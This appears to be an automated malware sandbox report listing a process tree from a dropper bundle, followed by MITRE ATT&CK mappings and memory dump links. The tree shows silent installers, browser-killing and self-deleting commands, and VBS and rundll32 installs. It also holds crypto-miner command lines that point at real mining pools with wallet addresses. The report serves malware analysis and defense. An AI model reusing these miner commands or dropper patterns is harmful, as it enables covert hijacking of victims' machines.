        14⤵
        Program crash
        
        PID:9184
        
        C:\Users\Admin\AppData\Local\Temp\ezx3frfd03i\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ezx3frfd03i\Setup3310.exe" /Verysilent /subid=577
        13⤵
        
        PID:8656
        
        C:\Users\Admin\AppData\Local\Temp\is-UR4B6.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-UR4B6.tmp\Setup3310.tmp" /SL5="$300DE,138429,56832,C:\Users\Admin\AppData\Local\Temp\ezx3frfd03i\Setup3310.exe" /Verysilent /subid=577
        14⤵
        
        PID:8916
        
        C:\Users\Admin\AppData\Local\Temp\is-31LDN.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-31LDN.tmp\Setup.exe" /Verysilent
        15⤵
        
        PID:6408
        
        C:\Users\Admin\AppData\Local\Temp\5xqwmx1pipg\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\5xqwmx1pipg\cpyrix.exe" /VERYSILENT
        13⤵
        
        PID:6396
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        14⤵
        
        PID:8288
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "{path}"
        15⤵
        
        PID:7292
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "{path}"
        15⤵
        
        PID:3696
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "{path}"
        15⤵
        
        PID:5384
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        14⤵
        
        PID:6036
        
        C:\Windows\SysWOW64\at.exe
        
        "C:\Windows\System32\at.exe"
        15⤵
        
        PID:4740
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub
        15⤵
        
        PID:6848
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe
        16⤵
        
        PID:2272
        
        C:\Users\Admin\AppData\Local\Temp\o2c2u3t3w5q\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\o2c2u3t3w5q\vpn.exe" /silent /subid=482
        13⤵
        
        PID:7296
        
        C:\Users\Admin\AppData\Local\Temp\is-I92U5.tmp\vpn.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-I92U5.tmp\vpn.tmp" /SL5="$200FA,15170975,270336,C:\Users\Admin\AppData\Local\Temp\o2c2u3t3w5q\vpn.exe" /silent /subid=482
        14⤵
        
        PID:4372
        
        C:\Users\Admin\AppData\Local\Temp\LOROTD5QED\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\LOROTD5QED\setups.exe" ll
        10⤵
        
        PID:8156
        
        C:\Users\Admin\AppData\Local\Temp\is-ODHGN.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-ODHGN.tmp\setups.tmp" /SL5="$A02F2,635399,250368,C:\Users\Admin\AppData\Local\Temp\LOROTD5QED\setups.exe" ll
        11⤵
        
        PID:5144
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\askinstall20.exe"
        9⤵
        
        PID:4336
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c taskkill /f /im chrome.exe
        10⤵
        
        PID:1056
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /f /im chrome.exe
        11⤵
        Kills process with taskkill
        
        PID:3592
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
        9⤵
        
        PID:7664
        
        C:\Users\Admin\AppData\Roaming\60C4.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\60C4.tmp.exe"
        10⤵
        
        PID:6584
        
        C:\Users\Admin\AppData\Roaming\60C4.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\60C4.tmp.exe"
        11⤵
        
        PID:8332
        
        C:\Users\Admin\AppData\Roaming\68B6.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\68B6.tmp.exe"
        10⤵
        
        PID:7380
        
        C:\Users\Admin\AppData\Roaming\674D.tmp.exe
        
        "C:\Users\Admin\AppData\Roaming\674D.tmp.exe"
        10⤵
        
        PID:5728
        
        C:\Windows\system32\msiexec.exe
        
        -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.work@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
        11⤵
        
        PID:9100
        
        C:\Windows\system32\msiexec.exe
        
        -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8 --cpu-max-threads-hint 50 -r 9999
        11⤵
        
        PID:6420
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX1\file.exe"
        10⤵
        
        PID:5268
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        11⤵
        Runs ping.exe
        
        PID:2244
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX1\md2_2efs.exe"
        9⤵
        
        PID:3928
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\oplp2h32.v33\Four.exe & exit
        7⤵
        
        PID:6848
        
        C:\Users\Admin\AppData\Local\Temp\oplp2h32.v33\Four.exe
        
        C:\Users\Admin\AppData\Local\Temp\oplp2h32.v33\Four.exe
        8⤵
        
        PID:7028
        
        C:\Users\Admin\AppData\Local\Temp\FS2N1IT76O\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FS2N1IT76O\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 104
        9⤵
        
        PID:5748
        
        C:\Users\Admin\AppData\Local\Temp\FS2N1IT76O\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FS2N1IT76O\multitimer.exe" 1 3.1617397124.60678584a6d26 104
        10⤵
        
        PID:7800
        
        C:\Users\Admin\AppData\Local\Temp\FS2N1IT76O\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\FS2N1IT76O\multitimer.exe" 2 3.1617397124.60678584a6d26
        11⤵
        
        PID:4992
        
        C:\Users\Admin\AppData\Local\Temp\2sx2ffyyj3b\gps0xbsqs4r.exe
        
        "C:\Users\Admin\AppData\Local\Temp\2sx2ffyyj3b\gps0xbsqs4r.exe" /ustwo INSTALL
        12⤵
        
        PID:8540
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 8540 -s 656
        13⤵
        Program crash
        
        PID:7880
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 8540 -s 668
        13⤵
        Program crash
        
        PID:5716
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 8540 -s 636
        13⤵
        Program crash
        
        PID:5924
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 8540 -s 680
        13⤵
        Program crash
        
        PID:6100
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 8540 -s 752
        13⤵
        Program crash
        
        PID:7968
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 8540 -s 896
        13⤵
        Program crash
        
        PID:8592
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 8540 -s 980
        13⤵
        Program crash
        
        PID:8920
        
        C:\Users\Admin\AppData\Local\Temp\ewycsiwzyye\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ewycsiwzyye\cpyrix.exe" /VERYSILENT
        12⤵
        
        PID:8716
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        13⤵
        
        PID:7896
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        13⤵
        
        PID:5932
        
        C:\Windows\SysWOW64\at.exe
        
        "C:\Windows\System32\at.exe"
        14⤵
        
        PID:8376
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub
        14⤵
        
        PID:5212
        
        C:\Users\Admin\AppData\Local\Temp\fzne1brd2zj\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\fzne1brd2zj\vpn.exe" /silent /subid=482
        12⤵
        
        PID:9176
        
        C:\Users\Admin\AppData\Local\Temp\is-UIMKO.tmp\vpn.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-UIMKO.tmp\vpn.tmp" /SL5="$90212,15170975,270336,C:\Users\Admin\AppData\Local\Temp\fzne1brd2zj\vpn.exe" /silent /subid=482
        13⤵
        
        PID:5920
        
        C:\Users\Admin\AppData\Local\Temp\m2svrkc1ohn\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\m2svrkc1ohn\vict.exe" /VERYSILENT /id=535
        12⤵
        
        PID:1884
        
        C:\Users\Admin\AppData\Local\Temp\is-FHIV5.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-FHIV5.tmp\vict.tmp" /SL5="$20626,870426,780800,C:\Users\Admin\AppData\Local\Temp\m2svrkc1ohn\vict.exe" /VERYSILENT /id=535
        13⤵
        
        PID:2056
        
        C:\Users\Admin\AppData\Local\Temp\is-EIM73.tmp\win1host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-EIM73.tmp\win1host.exe" 535
        14⤵
        
        PID:9100
        
        C:\Users\Admin\AppData\Local\Temp\feicuyjhobg\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\feicuyjhobg\app.exe" /8-23
        12⤵
        
        PID:7792
        
        C:\Users\Admin\AppData\Local\Temp\s5t30keusrw\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\s5t30keusrw\Setup3310.exe" /Verysilent /subid=577
        12⤵
        
        PID:8444
        
        C:\Users\Admin\AppData\Local\Temp\is-I7THH.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-I7THH.tmp\Setup3310.tmp" /SL5="$4041A,138429,56832,C:\Users\Admin\AppData\Local\Temp\s5t30keusrw\Setup3310.exe" /Verysilent /subid=577
        13⤵
        
        PID:5572
        
        C:\Users\Admin\AppData\Local\Temp\is-22HEL.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-22HEL.tmp\Setup.exe" /Verysilent
        14⤵
        
        PID:4360
        
        C:\Users\Admin\AppData\Local\Temp\Z1INLV8HSC\setups.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Z1INLV8HSC\setups.exe" ll
        9⤵
        
        PID:4912
        
        C:\Users\Admin\AppData\Local\Temp\is-21IK5.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-21IK5.tmp\setups.tmp" /SL5="$60370,635399,250368,C:\Users\Admin\AppData\Local\Temp\Z1INLV8HSC\setups.exe" ll
        10⤵
        
        PID:7472
- - C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\J1bOtx55AJEQ.exe
    "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\J1bOtx55AJEQ.exe"
    3⤵
    PID:6612
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
      4⤵
      PID:6164
- - C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe
    "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"
    3⤵
    PID:6604
  - - C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe
      "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"
      4⤵
      PID:5900
    - - C:\Users\Admin\Videos\lilal.exe
        
        "C:\Users\Admin\Videos\lilal.exe"
        5⤵
        
        PID:7812
      - C:\Windows\SysWOW64\at.exe
        
        "C:\Windows\System32\at.exe"
        6⤵
        
        PID:8012
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Dir.mui
        6⤵
        
        PID:7884
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe
        7⤵
        
        PID:8108
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Remove.bat" 5900 C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\lilalmix.exe"
        5⤵
        
        PID:3568
      - C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /PID 5900
        6⤵
        Kills process with taskkill
        
        PID:3260
- - C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe
    "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\Three.exe"
    3⤵
    PID:6596
  - - C:\Users\Admin\AppData\Local\Temp\NXDYFE2X86\multitimer.exe
      "C:\Users\Admin\AppData\Local\Temp\NXDYFE2X86\multitimer.exe" 0 306065bb10421b26.04333812 0 103
      4⤵
      PID:5988
    - - C:\Users\Admin\AppData\Local\Temp\NXDYFE2X86\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NXDYFE2X86\multitimer.exe" 1 3.1617397026.6067852289565 103
        5⤵
        
        PID:4944
      - C:\Users\Admin\AppData\Local\Temp\NXDYFE2X86\multitimer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\NXDYFE2X86\multitimer.exe" 2 3.1617397026.6067852289565
        6⤵
        
        PID:3564
        
        C:\Users\Admin\AppData\Local\Temp\3adum0a5jp1\vict.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3adum0a5jp1\vict.exe" /VERYSILENT /id=535
        7⤵
        
        PID:5316
        
        C:\Users\Admin\AppData\Local\Temp\is-QLQOA.tmp\vict.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-QLQOA.tmp\vict.tmp" /SL5="$8048E,870426,780800,C:\Users\Admin\AppData\Local\Temp\3adum0a5jp1\vict.exe" /VERYSILENT /id=535
        8⤵
        
        PID:4520
        
        C:\Users\Admin\AppData\Local\Temp\is-7PS0E.tmp\win1host.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-7PS0E.tmp\win1host.exe" 535
        9⤵
        
        PID:3408
        
        C:\Users\Admin\AppData\Local\Temp\3wbxksb4ef4\Setup3310.exe
        
        "C:\Users\Admin\AppData\Local\Temp\3wbxksb4ef4\Setup3310.exe" /Verysilent /subid=577
        7⤵
        
        PID:5360
        
        C:\Users\Admin\AppData\Local\Temp\is-HO2S5.tmp\Setup3310.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-HO2S5.tmp\Setup3310.tmp" /SL5="$304C2,138429,56832,C:\Users\Admin\AppData\Local\Temp\3wbxksb4ef4\Setup3310.exe" /Verysilent /subid=577
        8⤵
        
        PID:6112
        
        C:\Users\Admin\AppData\Local\Temp\is-T5GV7.tmp\Setup.exe
        
        "C:\Users\Admin\AppData\Local\Temp\is-T5GV7.tmp\Setup.exe" /Verysilent
        9⤵
        
        PID:1536
        
        C:\Users\Admin\AppData\Local\Temp\ah2wr4tg53y\uy1ofrmpf02.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ah2wr4tg53y\uy1ofrmpf02.exe" /ustwo INSTALL
        7⤵
        
        PID:4852
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 656
        8⤵
        Program crash
        
        PID:7480
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 684
        8⤵
        Program crash
        
        PID:7932
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 772
        8⤵
        Program crash
        
        PID:6952
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 820
        8⤵
        Program crash
        
        PID:7536
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 876
        8⤵
        Program crash
        
        PID:6068
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 924
        8⤵
        Program crash
        
        PID:7908
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4852 -s 964
        8⤵
        Program crash
        
        PID:1984
        
        C:\Users\Admin\AppData\Local\Temp\xiyky1qjza4\cpyrix.exe
        
        "C:\Users\Admin\AppData\Local\Temp\xiyky1qjza4\cpyrix.exe" /VERYSILENT
        7⤵
        
        PID:5616
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        C:\Users\Admin\AppData\Roaming\1.exe
        8⤵
        
        PID:3800
        
        C:\Users\Admin\AppData\Roaming\1.exe
        
        "{path}"
        9⤵
        
        PID:6812
        
        C:\Users\Admin\AppData\Roaming\2.exe
        
        C:\Users\Admin\AppData\Roaming\2.exe
        8⤵
        
        PID:7236
        
        C:\Windows\SysWOW64\at.exe
        
        "C:\Windows\System32\at.exe"
        9⤵
        
        PID:7768
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c C:\Windows\System32\cmd.exe < Tre.pub
        9⤵
        
        PID:2148
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\System32\cmd.exe
        10⤵
        
        PID:8048
        
        C:\Users\Admin\AppData\Local\Temp\qwkcgqeoc05\app.exe
        
        "C:\Users\Admin\AppData\Local\Temp\qwkcgqeoc05\app.exe" /8-23
        7⤵
        
        PID:5596
        
        C:\Users\Admin\AppData\Local\Temp\cgkg01waarh\vpn.exe
        
        "C:\Users\Admin\AppData\Local\Temp\cgkg01waarh\vpn.exe" /silent /subid=482
        7⤵
        
        PID:980
        
        C:\Users\Admin\AppData\Local\Temp\is-CP9JQ.tmp\vpn.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-CP9JQ.tmp\vpn.tmp" /SL5="$303DA,15170975,270336,C:\Users\Admin\AppData\Local\Temp\cgkg01waarh\vpn.exe" /silent /subid=482
        8⤵
        
        PID:4840
  - - C:\Users\Admin\AppData\Local\Temp\545SBPPMO2\setups.exe
      "C:\Users\Admin\AppData\Local\Temp\545SBPPMO2\setups.exe" ll
      4⤵
      PID:6592
    - - C:\Users\Admin\AppData\Local\Temp\is-T3NG4.tmp\setups.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-T3NG4.tmp\setups.tmp" /SL5="$70154,635399,250368,C:\Users\Admin\AppData\Local\Temp\545SBPPMO2\setups.exe" ll
        5⤵
        
        PID:3492
- - C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe
    "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\HookSetp.exe"
    3⤵
    PID:6588
- - C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe
    "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\guihuali-game.exe"
    3⤵
    PID:6580
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Program Files\unins.vbs"
      4⤵
      PID:7096
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\unins0000.dll",install
        5⤵
        
        PID:6284
- - C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe
    "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\22.exe"
    3⤵
    PID:6572
  - - C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Program Files\javcse\install.vbs"
      4⤵
      PID:4848
    - - C:\Windows\SysWOW64\rundll32.exe
        
        "C:\Windows\System32\rundll32.exe" "C:\Program Files\javcse\install.dll",install
        5⤵
        
        PID:6416
- - C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe
    "C:\Program Files (x86)\67e16a30-3df6-4d4c-a838-a81a8806dda3\Versium Research\RunWW.exe"
    3⤵
    PID:6472
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 912
      4⤵
      Program crash
      PID:6980
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 1004
      4⤵
      Program crash
      PID:3656
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 1060
      4⤵
      Program crash
      PID:2784
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 1116
      4⤵
      Program crash
      PID:2952
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 1144
      4⤵
      Program crash
      PID:8044
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 1172
      4⤵
      Program crash
      PID:7840
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 1080
      4⤵
      Program crash
      PID:3144
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 1452
      4⤵
      Program crash
      PID:4004
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 1552
      4⤵
      Program crash
      PID:3384
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 1708
      4⤵
      Program crash
      PID:9116
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 1616
      4⤵
      Program crash
      PID:8384
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 1604
      4⤵
      Program crash
      PID:8712
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 1808
      4⤵
      Program crash
      PID:9152
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 6472 -s 1800
      4⤵
      Program crash
      PID:8200

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:3888

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
PID:4368
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 5BD96105A33D813A8996B8074AA8100E C
  2⤵
  PID:5256
- C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 56EA09378B631AC8E28B1A36251A94C4
  2⤵
  PID:6392

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:2460

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:1516

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6524

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6980

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
PID:4492

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:5388

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7580

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8040

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7392

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
1⤵
PID:6968
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{7e2fb434-5d6f-124d-9f80-74346c1ed007}\oemvista.inf" "9" "4d14a44ff" "0000000000000174" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"
  2⤵
  PID:8044
- C:\Windows\system32\DrvInst.exe
  DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000174"
  2⤵
  PID:4056

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
1⤵
PID:3464

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
PID:5212

C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\3651f731e5774df79922703a32eecd92 /t 2988 /p 2984
1⤵
PID:5280

C:\Windows\explorer.exe
explorer.exe
1⤵
PID:7984

C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
"C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca
1⤵
PID:3428

C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
"C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe" -ServerName:CortanaUI.AppXa50dqqa5gqv4a428c9y1jjw7m3btvepj.mca
1⤵
PID:7628

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
1⤵
PID:7264

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Web Service

T1102

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/60-353-0x000001EEAA940000-0x000001EEAA9A7000-memory.dmp

Filesize
412KB

Download
memory/60-430-0x000001EEAAA30000-0x000001EEAAAAB000-memory.dmp

Filesize
492KB

Download
memory/60-716-0x000001EEAAAB0000-0x000001EEAAB2B000-memory.dmp

Filesize
492KB

Download
memory/60-105-0x000001EEA9DF0000-0x000001EEA9E57000-memory.dmp

Filesize
412KB

Download
memory/492-23-0x00007FFE1FC70000-0x00007FFE2065C000-memory.dmp

Filesize
9.9MB

Download
memory/492-25-0x0000000000EF0000-0x0000000000EF1000-memory.dmp

Filesize
4KB

Download
memory/492-32-0x000000001C810000-0x000000001C812000-memory.dmp

Filesize
